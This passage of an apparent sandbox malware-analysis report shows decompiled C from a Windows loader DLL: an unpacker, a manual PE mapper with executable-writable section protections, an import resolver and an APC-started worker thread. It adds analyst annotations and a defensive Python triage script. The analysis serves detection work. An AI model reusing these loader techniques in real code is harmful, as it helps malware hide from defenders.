              						CloseHandle(_t13);
              						_t13 = 0;
              						SetLastError(_t11);
              					}
              				}
              				return _t13;
              			}

              APIs
              • CreateThread.KERNELBASE ref: 6E1C13E8
              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
              • GetLastError.KERNEL32(00000000), ref: 6E1C1408
              • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
              • CloseHandle.KERNEL32(00000000), ref: 6E1C1419
              • SetLastError.KERNEL32(00000000), ref: 6E1C1422
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
              • String ID:
              • API String ID: 3832013932-0
              • Opcode ID: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction ID: 1e0629bde33280a18db333d60db0f8d39a5fb3288d0537c365b588c66174f1de
              • Opcode Fuzzy Hash: 52e76519a5a94b95598527cb7ce9f70990b0919b872d196cc21a6142f7820c10
              • Instruction Fuzzy Hash: 1EF01C37205B21BBDB125BA08C0CF9FBF69FB1AF51F00C444F609D1150C72A8866BBA5
              Uniqueness

              Uniqueness Score: -1.00%
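The CreateThread/QueueUserAPC pairing above, and the VirtualProtect(..., 0x40) call listed further down for the unresolved function at 6E291A78, are the two things a triage analyst would want to pull out of a report like this automatically. The following is an added example, not part of the Joe Sandbox report or of the sample: it parses the "APIs" bullets in the shape this page uses (an assumption about the format) and applies two rules. The sample lines are constructed by copying bullets from this report.

```python
"""Rule-based triage of a Joe Sandbox "APIs" listing (added example, not report output).

Assumed bullet shape, as seen on this page:
    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
    • Part of subcall function 6E1C13D1: CreateThread.KERNELBASE ref: 6E1C13E8
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument strings; '?' means the sandbox could not recover it
    ref: int                 # address of the call site
    subcall: Optional[int]   # function the call was attributed to via "Part of subcall", if any


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every bullet matching the report format; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:
        return None


def triage(text: str) -> List[Tuple[str, int]]:
    """Return (rule, call-site address) findings for two loader patterns.

    apc_thread_start: CreateThread followed (by call-site address, used as a proxy for
                      order within one function) by QueueUserAPC attributed to the same
                      function: the start routine is a placeholder, the APC is the entry.
    rwx_protect:      VirtualProtect whose third argument is PAGE_EXECUTE_READWRITE.
    """
    calls = parse_api_lines(text)
    findings = []
    threads = [c for c in calls if c.api == "CreateThread"]
    apcs = [c for c in calls if c.api == "QueueUserAPC"]
    for ct in threads:
        later = [q for q in apcs if q.ref > ct.ref and q.subcall == ct.subcall]
        if later:
            findings.append(("apc_thread_start", later[0].ref))
    for c in calls:
        if c.api == "VirtualProtect" and len(c.args) >= 3 and _hex(c.args[2]) == PAGE_EXECUTE_READWRITE:
            findings.append(("rwx_protect", c.ref))
    return findings


# Constructed input: bullets copied from this report for E6E1C13D1 and for the unresolved
# function at 6E291A78 (GetTempPathA is kept as a line no rule should fire on).
SAMPLE_APIS = """\
• CreateThread.KERNELBASE ref: 6E1C13E8
• QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1C13FD
• GetLastError.KERNEL32(00000000), ref: 6E1C1408
• TerminateThread.KERNEL32(00000000,00000000), ref: 6E1C1412
• GetTempPathA.KERNEL32(00000404,6E296410,?), ref: 6E291A78
• VirtualProtect.KERNELBASE(?,0000311B,00000040,?), ref: 6E291ACB
"""

# Constructed negative: the E6E1C20CE bullets, with no thread/APC pair and no VirtualProtect.
BENIGN_APIS = """\
• GetCurrentThread.KERNEL32 ref: 6E1C20D1
• SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1C20DC
• SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1C20EF
"""

if __name__ == "__main__":
    for rule, addr in triage(SAMPLE_APIS):
        print(f"{rule:17s} at 0x{addr:08X}")
```

The ordering rule relies on call-site addresses, which only approximates execution order inside one function; a loop or a forward branch can invert it, so the finding is a lead to check against the decompiled body, as the listing for E6E1C13D1 confirms here.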

              C-Code - Quality: 90%
              			// Unpacker: E6E1C1000 yields offset (_v28) and size (_v20) of the packed region relative to the module
              			// base kept at 0x6e1c41b0; the region is decoded one 0x1000 page at a time into a fresh buffer
              			// (VirtualAlloc: 0x3000 = MEM_COMMIT|MEM_RESERVE, 4 = PAGE_READWRITE; 8 = ERROR_NOT_ENOUGH_MEMORY).
              			// The running value _t77 is stored at 0x6e1c41cc and must end at 0x63699bc3, otherwise the result is
              			// dropped with 0xc (ERROR_INVALID_ACCESS); on success it is copied back over the original region and
              			// the buffer released (0x8000 = MEM_RELEASE). The same global is the key that later turns the odd
              			// immediates in E6E1C126D and E6E1C1F7C back into Win32 constants.
              			E6E1C18AD(void* __edi, intOrPtr _a4) {
              				intOrPtr _v8;
              				char _v12;
              				void* _v16;
              				unsigned int _v20;
              				intOrPtr _v24;
              				char _v28;
              				signed int _v32;
              				void* _v36;
              				signed int _v40;
              				signed char _v44;
              				void* _v48;
              				signed int _v56;
              				signed int _v60;
              				intOrPtr _t50;
              				void* _t57;
              				void* _t61;
              				signed int _t67;
              				signed char _t69;
              				signed char _t70;
              				void* _t76;
              				intOrPtr _t77;
              				unsigned int _t82;
              				intOrPtr _t86;
              				intOrPtr* _t89;
              				intOrPtr _t90;
              				void* _t91;
              				signed int _t93;
              
              				_t90 =  *0x6e1c41b0;
              				_t50 = E6E1C1000(_t90,  &_v28,  &_v20);
              				_v24 = _t50;
              				if(_t50 == 0) {
              					asm("sbb ebx, ebx");
              					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
              					_t91 = _t90 + _v28;
              					_v48 = _t91;
              					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
              					_t76 = _t57;
              					_v36 = _t76;
              					if(_t76 == 0) {
              						_v24 = 8;
              					} else {
              						_t69 = 0;
              						if(_t67 <= 0) {
              							_t77 =  *0x6e1c41cc;
              						} else {
              							_t86 = _a4;
              							_v8 = _t91;
              							_v8 = _v8 - _t76;
              							_t14 = _t86 + 0x6e1c5137; // 0x3220a9c2
              							_t61 = _t57 - _t91 + _t14;
              							_v16 = _t76;
              							do {
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t70 = _t69 + 1;
              								_v44 = _t70;
              								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
              								if(_t82 != 0) {
              									_v32 = _v32 & 0x00000000;
              									_t89 = _v16;
              									_v12 = 0x400;
              									do {
              										_t93 =  *((intOrPtr*)(_v8 + _t89));
              										_v40 = _t93;
              										if(_t93 == 0) {
              											_v12 = 1;
              										} else {
              											 *_t89 = _t93 + _v32 - _t82;
              											_v32 = _v40;
              											_t89 = _t89 + 4;
              										}
              										_t33 =  &_v12;
              										 *_t33 = _v12 - 1;
              									} while ( *_t33 != 0);
              								}
              								_t69 = _v44;
              								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
              								_v16 = _v16 + 0x1000;
              								 *0x6e1c41cc = _t77;
              							} while (_t69 < _t67);
              						}
              						if(_t77 != 0x63699bc3) {
              							_v24 = 0xc;
              						} else {
              							memcpy(_v48, _v36, _v20);
              						}
              						VirtualFree(_v36, 0, 0x8000); // executed
              					}
              				}
              				return _v24;
              			}

              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1C1903
              • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1C19C9
              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1C19E4
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Virtual$AllocFreememcpy
              • String ID: Jun 6 2021
              • API String ID: 4010158826-1013970402
              • Opcode ID: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction ID: 946bd0d6041729a63682bd53d4e662095b0b71ab877402adc9a4d5ab533848a2
              • Opcode Fuzzy Hash: 9041a89bcec87a96430e14d1da3950d0a1523ac08092a97f323d91dd00585abe
              • Instruction Fuzzy Hash: BB419171E4020A9FDF00CFD9C844ADEBBB5BF59B10F248129D905B7244C779AA46DF92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			// Routine _entry_ hands to E6E1C13D1 for the worker thread: pin to CPU 0, drop to
              			// THREAD_PRIORITY_BELOW_NORMAL (-1) while E6E1C1C7D runs, restore THREAD_PRIORITY_NORMAL (0)
              			// if it returned 0, then a lock xadd on a shared counter.
              			E6E1C20CE(void* __ecx, intOrPtr _a4) {
              				long _t3;
              				int _t4;
              				int _t9;
              				void* _t13;
              
              				_t13 = GetCurrentThread();
              				_t3 = SetThreadAffinityMask(_t13, 1); // executed
              				if(_t3 != 0) {
              					SetThreadPriority(_t13, 0xffffffff); // executed
              				}
              				_t4 = E6E1C1C7D(_a4); // executed
              				_t9 = _t4;
              				if(_t9 == 0) {
              					SetThreadPriority(_t13, _t4);
              				}
              				asm("lock xadd [eax], ecx");
              				return _t9;
              			}

              APIs
              • GetCurrentThread.KERNEL32 ref: 6E1C20D1
              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1C20DC
              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1C20EF
              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1C2102
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: Thread$Priority$AffinityCurrentMask
              • String ID:
              • API String ID: 1452675757-0
              • Opcode ID: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction ID: 2c79e13bd90c19555bf51c108f274b45117525a1d704e67eb3550663ab7717a1
              • Opcode Fuzzy Hash: 933d557eee8d911dd6a402775c867d4bb5510db097fbc0c16182fbf50dc663b2
              • Instruction Fuzzy Hash: 5CE09232305A112B96016B6D4C8CEAFAB9CEFA2B307110235F524D21D0CF9C8C5AB5AA
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempPathA.KERNEL32(00000404,6E296410,?), ref: 6E291A78
              • VirtualProtect.KERNELBASE(?,0000311B,00000040,?), ref: 6E291ACB
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: PathProtectTempVirtual
              • String ID: @
              • API String ID: 3422257996-2766056989
              • Opcode ID: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction ID: e63cf76e46b8c40e7ecaee793d322dc0eb3f9865a1344321cf64369ce3d49a0f
              • Opcode Fuzzy Hash: 96b367ceb8b84aa88f6892ffd6cf1cab6d122d737cbd145f412c7706924fe3cb
              • Instruction Fuzzy Hash: 4BA16CB0E42505CBDB08CFBAC48866DBBB3FF4A30AF54A12AD525A7359D7345540CB74
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			// Section protection pass of a manual PE mapper: __eax = IMAGE_NT_HEADERS (+6 NumberOfSections,
              			// +0x14 SizeOfOptionalHeader, +0x54 SizeOfHeaders), _a4 = mapped image base, _t58 walks the
              			// IMAGE_SECTION_HEADERs (+8 VirtualSize, +0xc VirtualAddress, +0x24 Characteristics, which the
              			// bt instructions test). _t57 is the global set by E6E1C18AD, 0x63699bc3 at run time, so the
              			// immediates resolve to PAGE_READWRITE (_t57 - 0x63699bbf = 4), PAGE_READONLY (- 0x63699bc1 = 2),
              			// PAGE_EXECUTE_READ (- 0x63699ba3 = 0x20), PAGE_EXECUTE_READWRITE (- 0x63699b83 = 0x40), and
              			// 0x777fa9b0 + _t57 * 0x28 wraps to 0x28 = sizeof(IMAGE_SECTION_HEADER).
              			E6E1C126D(void* __eax, void* _a4) {
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				long _v20;
              				int _t43;
              				long _t54;
              				signed int _t57;
              				void* _t58;
              				signed int _t60;
              
              				_v12 = _v12 & 0x00000000;
              				_t57 =  *0x6e1c41cc;
              				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
              				_v16 =  *(__eax + 6) & 0x0000ffff;
              				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
              				_v8 = _v8 & 0x00000000;
              				if(_v16 <= 0) {
              					L12:
              					return _v12;
              				} else {
              					goto L1;
              				}
              				while(1) {
              					L1:
              					_t60 = _v12;
              					if(_t60 != 0) {
              						goto L12;
              					}
              					asm("bt [esi+0x24], eax");
              					if(_t60 >= 0) {
              						asm("bt [esi+0x24], eax");
              						if(__eflags >= 0) {
              							L8:
              							_t54 = _t57 - 0x63699bbf;
              							L9:
              							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
              							if(_t43 == 0) {
              								_v12 = GetLastError();
              							}
              							_v8 = _v8 + 1;
              							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
              							if(_v8 < _v16) {
              								continue;
              							} else {
              								goto L12;
              							}
              						}
              						asm("bt [esi+0x24], eax");
              						_t54 = _t57 - 0x63699bc1;
              						if(__eflags >= 0) {
              							goto L9;
              						}
              						goto L8;
              					}
              					asm("bt [esi+0x24], eax");
              					if(_t60 >= 0) {
              						_t54 = _t57 - 0x63699ba3;
              					} else {
              						_t54 = _t57 - 0x63699b83;
              					}
              					goto L9;
              				}
              				goto L12;
              			}

              APIs
              • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E1C12A6
              • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1C131B
              • GetLastError.KERNEL32 ref: 6E1C1321
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: ProtectVirtual$ErrorLast
              • String ID:
              • API String ID: 1469625949-0
              • Opcode ID: 6370d544829a0ce01c0acfda8b4b9c4065407968fa529c2e37cd0f2d101497ff
              • Instruction ID: 6de340f4de621f47e0e158a919ecde2a9fb67c8515e8ff5d1d379560d900e39a
              • Opcode Fuzzy Hash: 6370d544829a0ce01c0acfda8b4b9c4065407968fa529c2e37cd0f2d101497ff
              • Instruction Fuzzy Hash: BD219131A0020ADFCB14CFD5C485AAAF7F5FF18719F104859D106D7984E3BCA69ADB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			// Worker body: fills a SECURITY_ATTRIBUTES at 0x6e1c41c0 (nLength 0xc, bInheritHandle 0) with a
              			// descriptor built from an SDDL string by ConvertStringSecurityDescriptorToSecurityDescriptorA
              			// (the thunk L6E1C1DA8, revision 1), then calls E6E1C1697 with key *0x6e1c41cc ^ 0xfd7cd1cf and on
              			// failure ExitThread(0xb) (ERROR_BAD_FORMAT). Otherwise E6E1C1144 creates a pagefile-backed named
              			// file mapping under that descriptor (its subcall list shows the name formatted from a FILETIME
              			// divided by _aulldiv), the wide string at *0x6e1c41b8 (sized with lstrlenW) appears to be stored
              			// after a leading DWORD, and the thread exits with the E6E1C1444 result.
              			E6E1C14E8() {
              				char _v28;
              				void _v44;
              				char _v48;
              				void* _v52;
              				long _t23;
              				int _t24;
              				void* _t28;
              				intOrPtr* _t30;
              				signed int _t34;
              				intOrPtr _t36;
              
              				_push(0);
              				_push(0x6e1c41c4);
              				_push(1);
              				_push( *0x6e1c41d0 + 0x6e1c5089);
              				 *0x6e1c41c0 = 0xc;
              				 *0x6e1c41c8 = 0; // executed
              				L6E1C1DA8(); // executed
              				_t34 = 6;
              				memset( &_v44, 0, _t34 << 2);
              				if(E6E1C1697( &_v44,  &_v28,  *0x6e1c41cc ^ 0xfd7cd1cf) == 0) {
              					_t23 = 0xb;
              					L7:
              					ExitThread(_t23);
              				}
              				_t24 = lstrlenW( *0x6e1c41b8);
              				_t7 = _t24 + 2; // 0x2
              				_t10 = _t24 + _t7 + 8; // 0xa
              				_t28 = E6E1C1144(_t36, _t10,  &_v48,  &_v52); // executed
              				if(_t28 == 0) {
              					_t30 = _v52;
              					 *_t30 = 0;
              					if( *0x6e1c41b8 == 0) {
              						 *((short*)(_t30 + 4)) = 0;
              					} else {
              						E6E1C2118(_t40, _t30 + 4);
              					}
              				}
              				_t23 = E6E1C1444(_v44); // executed
              				goto L7;
              			}

              APIs
              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E1C41C4,00000000), ref: 6E1C1519
              • lstrlenW.KERNEL32(?,?,?), ref: 6E1C154D
                • Part of subcall function 6E1C1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?,?), ref: 6E1C1151
                • Part of subcall function 6E1C1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1C1167
                • Part of subcall function 6E1C1144: _snwprintf.NTDLL ref: 6E1C118C
                • Part of subcall function 6E1C1144: CreateFileMappingW.KERNELBASE(000000FF,6E1C41C0,00000004,00000000,?,?), ref: 6E1C11B1
                • Part of subcall function 6E1C1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11C8
                • Part of subcall function 6E1C1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A), ref: 6E1C11FD
              • ExitThread.KERNEL32 ref: 6E1C159C
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
              • String ID:
              • API String ID: 4209869662-0
              • Opcode ID: 6af3099644ce70fd104e6c0079e4cf642078561fd0cb4dbe9dfb6e9730e7bf18
              • Instruction ID: 18c92fd0fc231d1c8a554e584d239e097ef40d85531394c2ee019f597a969bfd
              • Opcode Fuzzy Hash: 6af3099644ce70fd104e6c0079e4cf642078561fd0cb4dbe9dfb6e9730e7bf18
              • Instruction Fuzzy Hash: EF1190B2288601AFDB01CFA5C848D9B7BFCAB66F04F014916F559D7140D738E58AAB93
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			// Import resolver of the same mapper: __edi = image base, _a4 = IMAGE_NT_HEADERS, and
              			// _t59 * 8 - 0x1b4cdd98 wraps to 0x80, the import DataDirectory RVA (+0x50 is SizeOfImage).
              			// Each IMAGE_IMPORT_DESCRIPTOR (0x14 bytes: +0 OriginalFirstThunk, +0xc Name, +0x10 FirstThunk)
              			// is resolved with LoadLibraryA/GetProcAddress; a thunk with the sign bit set is an import by
              			// ordinal (low 16 bits), otherwise an IMAGE_IMPORT_BY_NAME with the name at +2. The DLL name and
              			// hint/name entries are zeroed after use (_t59 - 0x63699bc3 == 0) and thunks advance by
              			// 0x725990f8 + _t59 * 4 == 4. Errors: _t59 - 0x63699b44 == 0x7f (ERROR_PROC_NOT_FOUND),
              			// _t59 + 0x9c9664bb == 0x7e (ERROR_MOD_NOT_FOUND).
              			E6E1C1F7C(void* __edi, intOrPtr _a4) {
              				signed int _v8;
              				intOrPtr* _v12;
              				_Unknown_base(*)()** _v16;
              				signed int _v20;
              				signed short _v24;
              				struct HINSTANCE__* _v28;
              				intOrPtr _t43;
              				intOrPtr* _t45;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t47;
              				intOrPtr* _t49;
              				intOrPtr _t50;
              				signed short _t51;
              				_Unknown_base(*)()* _t53;
              				CHAR* _t54;
              				_Unknown_base(*)()* _t55;
              				void* _t58;
              				signed int _t59;
              				_Unknown_base(*)()* _t60;
              				intOrPtr _t61;
              				intOrPtr _t65;
              				signed int _t68;
              				void* _t69;
              				CHAR* _t71;
              				signed short* _t73;
              
              				_t69 = __edi;
              				_v20 = _v20 & 0x00000000;
              				_t59 =  *0x6e1c41cc;
              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
              				if(_t43 != 0) {
              					_t45 = _t43 + __edi;
              					_v12 = _t45;
              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
              					if(_t46 != 0) {
              						while(1) {
              							_t71 = _t46 + _t69;
              							_t47 = LoadLibraryA(_t71); // executed
              							_v28 = _t47;
              							if(_t47 == 0) {
              								break;
              							}
              							_v24 = _v24 & 0x00000000;
              							 *_t71 = _t59 - 0x63699bc3;
              							_t49 = _v12;
              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
              							_t50 =  *_t49;
              							if(_t50 != 0) {
              								L6:
              								_t73 = _t50 + _t69;
              								_v16 = _t61 + _t69;
              								while(1) {
              									_t51 =  *_t73;
              									if(_t51 == 0) {
              										break;
              									}
              									if(__eflags < 0) {
              										__eflags = _t51 - _t69;
              										if(_t51 < _t69) {
              											L12:
              											_t21 =  &_v8;
              											 *_t21 = _v8 & 0x00000000;
              											__eflags =  *_t21;
              											_v24 =  *_t73 & 0x0000ffff;
              										} else {
              											_t65 = _a4;
              											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
              											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
              												goto L12;
              											} else {
              												goto L11;
              											}
              										}
              									} else {
              										_t51 = _t51 + _t69;
              										L11:
              										_v8 = _t51;
              									}
              									_t53 = _v8;
              									__eflags = _t53;
              									if(_t53 == 0) {
              										_t54 = _v24 & 0x0000ffff;
              									} else {
              										_t54 = _t53 + 2;
              									}
              									_t55 = GetProcAddress(_v28, _t54);
              									__eflags = _t55;
              									if(__eflags == 0) {
              										_v20 = _t59 - 0x63699b44;
              									} else {
              										_t68 = _v8;
              										__eflags = _t68;
              										if(_t68 != 0) {
              											 *_t68 = _t59 - 0x63699bc3;
              										}
              										 *_v16 = _t55;
              										_t58 = 0x725990f8 + _t59 * 4;
              										_t73 = _t73 + _t58;
              										_t32 =  &_v16;
              										 *_t32 = _v16 + _t58;
              										__eflags =  *_t32;
              										continue;
              									}
              									goto L23;
              								}
              							} else {
              								_t50 = _t61;
              								if(_t61 != 0) {
              									goto L6;
              								}
              							}
              							L23:
              							_v12 = _v12 + 0x14;
              							_t46 =  *((intOrPtr*)(_v12 + 0xc));
              							if(_t46 != 0) {
              								continue;
              							} else {
              							}
              							L26:
              							goto L27;
              						}
              						_t60 = _t59 + 0x9c9664bb;
              						__eflags = _t60;
              						_v20 = _t60;
              						goto L26;
              					}
              				}
              				L27:
              				return _v20;
              			}

              APIs
              • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1C1FB4
              • GetProcAddress.KERNEL32(?,00000000), ref: 6E1C2026
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction ID: f992cfdbcde13cd31fb28b6e3f1b0a89e489c140df5a262a14a975afbff3f888
              • Opcode Fuzzy Hash: c748fc5e8b8994ffc6bb63df03aa65b9411437cb7578e2276a3303b1141ca453
              • Instruction Fuzzy Hash: AA316B71A00606DFDB40CF99C894AAEB7F4FF29B00B20406ED815E7344E778DA95EB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 83%
              			E6E1C1ADB(void* __ecx) {
              				void* _v8;
              				char _v12;
              				char* _t18;
              				char* _t25;
              				char* _t29;
              
              				_t22 = __ecx;
              				_push(__ecx);
              				_push(__ecx);
              				_t25 = 0;
              				if(E6E1C1697( &_v8,  &_v12,  *0x6e1c41cc ^ 0x196db149) != 0) {
              					if(_v8 == 0) {
              						_t29 = 0;
              					} else {
              						_t29 = E6E1C2087(_t22, _v8,  *0x6e1c41cc ^ 0x6e49bbff);
              					}
              					if(_t29 != 0) {
              						_v12 = E6E1C1E8A(_t22) & 0x0000ffff;
              						_t18 = StrStrIA(_t29,  &_v12); // executed
              						if(_t18 != 0) {
              							_t25 = 0x657;
              						}
              					}
              					HeapFree( *0x6e1c4190, 0, _v8);
              				}
              				return _t25;
              			}

              APIs
              • StrStrIA.KERNELBASE(00000000,6E1C1CE6,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B32
              • HeapFree.KERNEL32(00000000,?,?,6E1C1CE6,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B4C
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 1e3674f53436eb6d26a43b4bdd59668a53ba879cfe767a7d732bd85376c51c23
              • Instruction ID: cd0a8975aa1de8ab96023e7bd82271ea0a35348a2be9e1cc95c7e2955ad8bdc8
              • Opcode Fuzzy Hash: 1e3674f53436eb6d26a43b4bdd59668a53ba879cfe767a7d732bd85376c51c23
              • Instruction Fuzzy Hash: 7D01D476B40515ABCB01CBE5CC04EDF7BBDEB65A00F204162AA04E3100E639EA45BAA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,6E296BE0), ref: 6E297245
              Memory Dump Source
              • Source File: 00000004.00000002.464772699.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 3b7f4f277552c08043b77d53c2eaeb7fb0dece6731ac5fd554f8099d5e0bcc64
              • Instruction ID: 5f650b33fbf91d3fd2e8880e8d98c678b726e1b9c6253895a0497eeb5d318631
              • Opcode Fuzzy Hash: 3b7f4f277552c08043b77d53c2eaeb7fb0dece6731ac5fd554f8099d5e0bcc64
              • Instruction Fuzzy Hash: E4210E321092468FD70BCF65C8A07867B62AB82300F1E15ABCC46EF3C6D760680ADB60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E6E1C1444(void* __eax) {
              				char _v8;
